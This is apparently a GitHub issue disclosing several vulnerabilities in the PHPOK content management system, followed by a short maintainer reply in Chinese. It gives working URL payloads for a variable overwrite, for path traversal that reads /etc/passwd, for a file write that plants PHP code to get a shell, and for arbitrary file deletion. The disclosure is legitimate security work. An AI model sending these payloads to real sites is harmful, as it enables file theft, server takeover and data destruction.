Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
from the Entrance of framework,i discovered parse_str variable overwrite in framework/init.php
parse_str
framework/init.php
we could watch $query_string parameter in framework/libs/server.php :
$query_string
framework/libs/server.php
payload:http://phpok/?data[script]=passer6y
http://phpok/?data[script]=passer6y
back to the: framework/admin/tpl_control.php
framework/admin/appsys_control.php
there is two file have this vulnerability: payload1:
/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd
payload2:
/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd
edit_save_f() function In framework/admin/tpl_control.php 383 line
edit_save_f()
framework/admin/tpl_control.php
payload:/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
framework/admin/tpl_control.php 303行 delfile_f()函数:
delfile_f()
payload: /admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
The text was updated successfully, but these errors were encountered:
感谢您如此仔细的测评! 这里我们先说明一下,后台针对已经登录的管理员(目前是系统管理员)是有最高权限的! 回头我们会针对普通管理员进行一定的限制,感谢您的支持
Sorry, something went wrong.
No branches or pull requests
Variable Overwrite Vulnerability
from the Entrance of framework,i discovered

parse_strvariable overwrite inframework/init.phpwe could watch
$query_stringparameter inframework/libs/server.php:payload:

http://phpok/?data[script]=passer6yVulnerability to read arbitrary files
back to the:

framework/admin/tpl_control.php
framework/admin/appsys_control.php

there is two file have this vulnerability:
payload1:
payload2:
Arbitrary File Writing to getshell
edit_save_f()function Inframework/admin/tpl_control.php383 linepayload:
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3fArbitrary file delete Vulnerability
framework/admin/tpl_control.php 303行

delfile_f()函数:payload:

/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.phpThe text was updated successfully, but these errors were encountered: